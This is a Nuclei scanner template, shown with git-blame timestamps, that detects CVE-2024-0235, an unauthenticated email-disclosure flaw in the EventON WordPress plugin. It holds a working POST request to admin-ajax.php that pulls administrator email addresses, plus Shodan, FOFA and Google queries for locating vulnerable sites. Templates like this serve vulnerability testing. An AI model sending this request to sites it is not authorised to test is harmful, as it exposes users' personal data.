nuclei-templates/http/cves/2024/CVE-2024-0235.yaml

68 lines
2.3 KiB
YAML
Raw Normal View History

2024-04-28 06:04:28 +00:00
id: CVE-2024-0235
info:
2024-04-30 05:50:00 +00:00
name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
2024-04-28 06:04:28 +00:00
author: princechaddha
severity: medium
2024-04-28 09:17:42 +00:00
description: |
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
2024-04-28 06:04:28 +00:00
impact: |
An attacker could potentially access sensitive email information.
remediation: |
Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
reference:
- https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
- https://github.com/fkie-cad/nvd-json-data-feeds
2024-04-30 05:50:00 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-0235
2024-04-28 06:04:28 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-0235
cwe-id: CWE-862
epss-score: 0.00052
2024-04-28 09:17:42 +00:00
epss-percentile: 0.19233
2024-04-28 06:04:28 +00:00
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2024-04-28 06:04:28 +00:00
vendor: myeventon
product: eventon
framework: wordpress
shodan-query:
- "vuln:CVE-2023-2796"
- http.html:/wp-content/plugins/eventon-lite/
- http.html:/wp-content/plugins/eventon/
fofa-query:
- "wp-content/plugins/eventon/"
- body=/wp-content/plugins/eventon/
- body=/wp-content/plugins/eventon-lite/
publicwww-query:
- "/wp-content/plugins/eventon/"
- /wp-content/plugins/eventon-lite/
google-query: "inurl:\"/wp-content/plugins/eventon/\""
tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon
2024-04-28 06:04:28 +00:00
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"
headers:
Content-Type: application/x-www-form-urlencoded
body: "_user_role=administrator"
2024-04-28 09:17:42 +00:00
matchers-condition: and
2024-04-28 06:04:28 +00:00
matchers:
- type: word
2024-04-28 09:24:02 +00:00
part: body
2024-04-28 06:04:28 +00:00
words:
2024-04-28 09:17:42 +00:00
- '@'
2024-04-30 05:50:00 +00:00
- 'status":"good'
- 'value='
2024-04-28 09:17:42 +00:00
- '"content":'
2024-04-28 09:24:02 +00:00
condition: and
2024-04-28 09:17:42 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950